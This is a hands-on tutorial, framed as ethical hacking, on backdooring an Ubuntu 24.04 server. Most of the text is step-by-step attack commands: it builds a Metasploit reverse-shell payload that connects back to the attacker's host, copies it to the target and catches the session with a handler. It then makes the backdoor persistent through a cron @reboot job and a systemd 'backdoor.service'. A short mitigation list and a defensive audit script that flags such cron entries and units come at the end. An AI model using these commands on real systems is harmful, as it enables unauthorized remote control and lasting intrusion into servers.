Hands-on: Installing a Backdoor and Persistence Techniques on a Target System
Understanding how a backdoor is installed and how persistence techniques work on an Ubuntu 24.04 server is an important part of ethical hacking, because it shows how attackers keep sustained access to a system. Below are detailed steps and hands-on example techniques for installing a backdoor and maintaining access on an Ubuntu 24.04 server.
1. Installing a Backdoor Using Metasploit
The Metasploit Framework is an effective tool for installing a backdoor. We will use a Metasploit exploit to install a backdoor on the server.
Steps:
Preparation:
- Run Kali Linux and open Metasploit with the command:
msfconsole
Create a Payload:
- Create a backdoor payload (e.g., reverse shell) that will run on the Ubuntu server. Use msfvenom to create the payload file.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your_IP LPORT=your_PORT -f elf > backdoor.elf
- The LHOST parameter is the IP of the attacking machine, and LPORT is the port that will be used for communication.
Transfer Payload to Ubuntu Server:
- Use scp to transfer the payload to the Ubuntu 24.04 server.
scp backdoor.elf user@server_IP:/tmp/
Run Payload on Ubuntu Server:
- Once the payload is on the server, change the permissions and execute it:
chmod +x /tmp/backdoor.elf
/tmp/backdoor.elf
Run Handler on Kali Linux:
- Set up a handler in Metasploit to catch the connection from the server:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST your_IP
set LPORT your_PORT
exploit
Access Meterpreter:
- If the payload was successfully executed, you will obtain a meterpreter session. Example basic commands:
meterpreter > sysinfo
meterpreter > shell
2. Persistence Techniques
Once the backdoor is installed, persistence techniques are necessary for an attacker to regain access even after a system restart.
Example of Persistence Technique with Cron Job:
Create Backdoor Script:
- For example, create a bash script to run the backdoor automatically after a server reboot:
echo -e '#!/bin/bash\n/tmp/backdoor.elf' > /tmp/persist.sh
chmod +x /tmp/persist.sh
Set Cron Job to Run Backdoor:
- Edit the user's crontab to run this script every time the system boots:
crontab -e
Add the following line to the crontab:
@reboot /tmp/persist.sh
Verify Cron Job:
- Ensure the cron job was successfully set by listing the cron jobs:
crontab -l
Example of Persistence Technique with Systemd:
Create Service File:
- Create a service file in /etc/systemd/system/:
sudo nano /etc/systemd/system/backdoor.service
- Add the following configuration:
[Unit]
Description=Backdoor Service

[Service]
ExecStart=/tmp/backdoor.elf
Restart=always

[Install]
WantedBy=multi-user.target
Enable and Start Service:
- Enable and start the service to ensure it runs automatically at boot:
sudo systemctl enable backdoor.service
sudo systemctl start backdoor.service
Check Service Status:
- To see if the backdoor service is running:
sudo systemctl status backdoor.service
By using one or a combination of the techniques above, an attacker can maintain access to the server. In the context of ethical hacking, it is important to study this to understand how such attacks occur and what mitigation steps can be taken to prevent them.
Mitigation:
To prevent backdoors and persistence, several mitigation steps should be taken, including:
- Regularly checking for suspicious cron jobs.
- Checking for newly added services in systemd.
- Using IDS/IPS to detect unauthorized connections.
- Enabling audit logs to detect system configuration changes.
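The first two mitigation checks can be scripted. The POSIX shell script below is an added example and is not part of the original hands-on: it flags crontab entries that run at @reboot or execute something from a world-writable staging directory (/tmp, /var/tmp, /dev/shm), and systemd units whose ExecStart= points into one of those directories, which is exactly the footprint the cron and systemd persistence steps above leave behind. The function names, the list of "suspect" directories and the sample crontab and unit files are assumptions constructed for the demonstration.

```shell
#!/bin/sh
# Added audit example, not part of the original hands-on: flag cron entries and
# systemd units whose command line points into a world-writable staging
# directory (/tmp, /var/tmp, /dev/shm), the pattern the persistence steps
# above rely on. Function names and the sample inputs are constructed here.

# Extended regex matching a path under a suspect directory, either at the
# start of the line, after whitespace (cron field) or after '=' (ExecStart=).
SUSPECT_DIR_RE='(^|[[:space:]=])/(tmp|var/tmp|dev/shm)/'

# is_suspect_path LINE: succeed (exit 0) when LINE references a suspect directory.
is_suspect_path() {
    printf '%s\n' "$1" | grep -Eq "$SUSPECT_DIR_RE"
}

# audit_crontab: read crontab text on stdin; print one "CRON: ..." line for
# every entry that runs at @reboot or executes something from a suspect
# directory. Blank lines and comments are skipped.
audit_crontab() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        case "$line" in
            @reboot*) printf 'CRON: %s\n' "$line" ;;
            *) if is_suspect_path "$line"; then printf 'CRON: %s\n' "$line"; fi ;;
        esac
    done
    return 0
}

# audit_unit NAME: read one systemd unit on stdin; print its ExecStart= line
# when the executable lives in a suspect directory.
audit_unit() {
    while IFS= read -r line; do
        case "$line" in
            ExecStart=*)
                if is_suspect_path "$line"; then
                    printf 'UNIT %s: %s\n' "$1" "$line"
                fi ;;
        esac
    done
    return 0
}

# audit_units_dir DIR: run audit_unit over every *.service file in DIR.
audit_units_dir() {
    for f in "$1"/*.service; do
        [ -e "$f" ] || continue
        audit_unit "${f##*/}" < "$f"
    done
    return 0
}

# Constructed samples mirroring the persistence steps in the hands-on.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
@reboot /tmp/persist.sh
*/5 * * * * /dev/shm/.x'

SAMPLE_BACKDOOR_UNIT='[Unit]
Description=Backdoor Service
[Service]
ExecStart=/tmp/backdoor.elf
Restart=always
[Install]
WantedBy=multi-user.target'

SAMPLE_BENIGN_UNIT='[Unit]
Description=Regular background program processing daemon
[Service]
ExecStart=/usr/sbin/cron -f'

# run_demo: write the samples into a scratch directory and audit them.
# Prints the two suspicious cron entries and the backdoor unit only.
run_demo() {
    dir=$(mktemp -d)
    printf '%s\n' "$SAMPLE_BACKDOOR_UNIT" > "$dir/backdoor.service"
    printf '%s\n' "$SAMPLE_BENIGN_UNIT" > "$dir/cron.service"
    printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab
    audit_units_dir "$dir"
    rm -rf "$dir"
}

run_demo
```

On a live host the same functions are fed real data: `crontab -l | audit_crontab` for the current user, `sudo sh -c 'cat /var/spool/cron/crontabs/* /etc/cron.d/*' | audit_crontab` for every user and the system cron directory, and `audit_units_dir /etc/systemd/system` for locally added units. Treat the directory list as a heuristic rather than a rule: it catches the staging locations used in this hands-on, and any unit or cron entry it reports still has to be reviewed by hand. For the fourth mitigation item, an auditd watch such as `sudo auditctl -w /etc/systemd/system -p wa -k systemd_units` records every write to the unit directory, so a new service file shows up in the audit log even if it is placed outside the suspect directories.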